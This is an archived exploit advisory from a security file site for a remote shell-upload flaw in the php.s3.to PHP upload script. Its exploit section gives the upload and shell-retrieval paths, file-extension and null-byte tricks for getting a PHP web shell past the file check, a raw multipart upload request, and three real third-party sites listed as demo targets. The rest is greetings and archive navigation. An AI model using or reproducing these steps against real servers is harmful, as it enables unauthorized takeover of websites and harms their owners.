what you don't know can hurt you

php.s3.to Upload Script Shell Upload

php.s3.to Upload Script Shell Upload
Posted Aug 18, 2012
Authored by Mr.XpR

The upload script offered by php.s3.to suffers from a remote shell upload vulnerability.

tags | exploit, remote, shell, php
MD5 | 0c4ff061e0d5708c347933125c556af2

php.s3.to Upload Script Shell Upload

Change Mirror Download
######################################

Explit Title : "PHP S3 TO" Remote File Upload

Download : http://php.s3.to/script.php

Author : MR.XpR

Test on : LinuX R3dH4t

Bug discovered by : IRANHACK SecuRITY TEAM

#####################################

[+] Exploit :

[Protocol]Site.CoM/[dir]/up/upload.php

--------------------------------------------------------------

[+] Load files From :

[Protocol]Site.CoM/[dir]/up/img/Sh3ll.php.jpg

--------------------------------------------------------------

[+] Demo :

http://security2600.sakura.ne.jp/up/upload.php
http://omame.dnsalias.net/up/upload.php
http://diaros.net/up/upload.php

--------------------------------------------------------------

[+] Information :

This Bug Uploading a TxT , PhP , JpG , PNg

change your shell to sh3ll.php.jpg or sh3ll.php%0%0.1.jpg

If Doesn't Work Use Tamper Data FireFox Plugin

--------------------------------------------------------------

[+] Upload Headers :

114782935826962\r\nContent-Disposition: form-data;
name="MAX_FILE_SIZE"\r\n\r\n1048576\r\n-1147829358
26962\r\nContent-Disposition: form-data;name="upfile";
filename="sh3ll.php.jpg"\r\nContent-Type: text/plain\r\n\r\n\r\n
-----------------------------114782935826962\r\nContent-Disposition:
form-data; name="pass"\r\n\r\n\r\n--114782935826962\r\nContent-Disposition:form-data;
name="com"\r\n\r\n\r\n-----------------------------114782935826962--\r\n


[+] Special TnX To :

Mr.XpR - Syamak Black - UnknowN - MR.EBI - Farbod Ezaril - Samim.s
Saman Biliz - Sianor - Cair3x - M.R.S.C.0 - Bl4ck.Viper - Black King
Yaghi vahghi - H3llboy - inj3ct0r - Netqurd - Fixxer- R3ZA BLACK HAT
IRIST - Sokote.vahshat - TBH - IBH - IRH - ArYaIeIrAN - W0lf - Ajax TM
joker_s - mr.4lir3z4 - nimaarek - All iranian Hackerz
Login or Register to add favorites

File Archive:

June 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    10 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    0 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    0 Files
  • 7
    Jun 7th
    0 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    0 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close